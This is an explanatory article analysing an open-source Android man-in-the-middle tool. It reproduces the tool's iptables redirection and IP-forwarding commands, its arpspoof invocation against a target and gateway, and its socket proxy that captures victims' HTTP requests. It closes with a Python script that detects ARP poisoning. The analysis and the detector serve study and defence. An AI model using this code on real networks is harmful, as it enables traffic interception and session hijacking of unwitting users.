Android Man-in-the-Middle Attacks


0x00

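The idea behind an Android man-in-the-middle attack is to hijack the conversation between the attacked machine and the server on a local network. The attacked machine and the server appear to work normally, but the traffic between them has in fact been hijacked by the man in the middle. A diagram makes this process clear.

Data sent by the attacked host first passes through the attacker, and data returned by the server also passes through the attacker before being sent on to the attacked host.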

0x01

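For an open-source example of an Android man-in-the-middle attack, see https://github.com/ssun125/Lanmitm. Here we mainly analyze the principle behind the session hijacking shown in the effect preview at that link.

Analyzing the source code of https://github.com/ssun125/Lanmitm, implementing ARP spoofing involves four key steps: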

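1. Use iptables for NAT packet forwarding

    public static final String[] PORT_REDIRECT_CMD = {
        // Flush the existing nat and filter rules
        "iptables -t nat -F",
        "iptables -F",
        // Masquerade forwarded traffic and accept it in the FORWARD chain
        "iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",
        "iptables -P FORWARD ACCEPT",
        // Redirect TCP port 80 (plain HTTP) to the local HTTP proxy
        "iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "
                + AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT
    };

These commands are invoked in the startHttpProxy method of the ProxyService class.

2. Enable IP forwarding, so that the local machine forwards packets the way a router does

    private String[] FORWARD_COMMANDS = {
        "echo 1 > /proc/sys/net/ipv4/ip_forward",
        "echo 1 > /proc/sys/net/ipv6/conf/all/forwarding"
    };

These are invoked in the onStartCommand method of the ArpService class.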

3. ARP poisoning

    if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
        if (target_ip == null)
            target_ip = AppContext.getTarget().getIp();

        if (!target_ip.equals(AppContext.getGateway()))
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + target_ip + " "
                    + AppContext.getGateway();
        else
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + AppContext.getGateway() + " "
                    + target_ip;

        // Run arpspoof in its own thread
        arpSpoof = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_cmd, true, false);
            }
        };
        arpSpoof.start();
    }
    if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
        arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                + " -t " + AppContext.getGateway() + " "
                + AppContext.getIp();

        arpSpoofRecv = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
            }
        };
        arpSpoofRecv.start();
    }

This is invoked in the onStartCommand method of the ArpService class.

4. On the attacker's machine, a web server is built directly on sockets, similar in principle to implementing a simple web server with NanoHttpd. Requests that the victim sends to the attacker can then be captured and displayed in the UI.

The core code is as follows:

    public class HttpProxy extends Thread {
        // ...... (elided in the original)

        @Override
        public void run() {
            try {
                mServerSocket = new ServerSocket();
                mServerSocket.setReuseAddress(true);
                mServerSocket.bind(new InetSocketAddress(AppContext.getInetAddress(),
                        HTTP_PROXY_PORT), BACKLOG);
                executor = Executors.newCachedThreadPool();
                // Accept each redirected connection and handle it on a pool thread
                while (!stop) {
                    Socket client = mServerSocket.accept();
                    DealThread dealThread = null;
                    switch (mProxyMode) {
                    case MODE_PROXY_SIMPLE:
                        dealThread = new SimpleDealThread(client, mOnRequestListener);
                        break;
                    case MODE_PROXY_DEEP:
                        dealThread = new DeepDealThread(client, mOnRequestListener);
                        break;
                    }
                    executor.execute(dealThread);
                }
            } catch (IOException e) {
                e.printStackTrace();
            } finally {
                if (mServerSocket != null) {
                    try {
                        mServerSocket.close();
                    } catch (IOException e) {
                        e.printStackTrace();
                    }
                }
                if (executor != null) {
                    executor.shutdownNow();
                }
            }
        }

        // ...... (elided in the original)
    }
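The ARP poisoning in step 3 leaves a trace on the affected host: its ARP table maps the gateway's IP to the attacker's MAC, which the attacker's own IP usually maps to as well. The Python check below over /proc/net/arp is an added example, not part of Lanmitm or the original article; the sample table, the addresses and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of /proc/net/arp from a host whose gateway entry is poisoned.
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:aa:bb:cc     *        wlan0
192.168.1.23     0x1         0x2         02:00:00:aa:bb:cc     *        wlan0
192.168.1.40     0x1         0x2         02:00:00:11:22:33     *        wlan0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

ATF_COM = 0x02  # kernel flag: entry is complete (MAC resolved)


def parse_arp_table(text):
    """Return (ip, mac, device) tuples for every complete ARP entry."""
    entries = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields
        if not int(flags, 16) & ATF_COM or mac == "00:00:00:00:00:00":
            continue                             # unresolved entry
        entries.append((ip, mac.lower(), device))
    return entries


def check_gateway(entries, gateway_ip, pinned_mac=None):
    """Return a list of findings about the gateway's ARP entry."""
    findings = []
    ips_by_mac = defaultdict(set)
    gateway_mac = None
    for ip, mac, device in entries:
        ips_by_mac[(device, mac)].add(ip)
        if ip == gateway_ip:
            gateway_mac, gateway_dev = mac, device
    if gateway_mac is None:
        return ["gateway has no complete ARP entry"]
    # A known-good MAC recorded earlier (assumption: the operator pins one)
    if pinned_mac and gateway_mac != pinned_mac.lower():
        findings.append(f"gateway MAC is {gateway_mac}, expected {pinned_mac.lower()}")
    others = sorted(ips_by_mac[(gateway_dev, gateway_mac)] - {gateway_ip})
    if others:
        findings.append(f"gateway MAC {gateway_mac} also claimed by {', '.join(others)}")
    return findings


if __name__ == "__main__":
    for finding in check_gateway(parse_arp_table(SAMPLE_ARP), "192.168.1.1"):
        print("ALERT:", finding)
```

A shared MAC can also be legitimate (for example proxy ARP on some routers), so treat a finding as a prompt to compare against the gateway's known hardware address.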
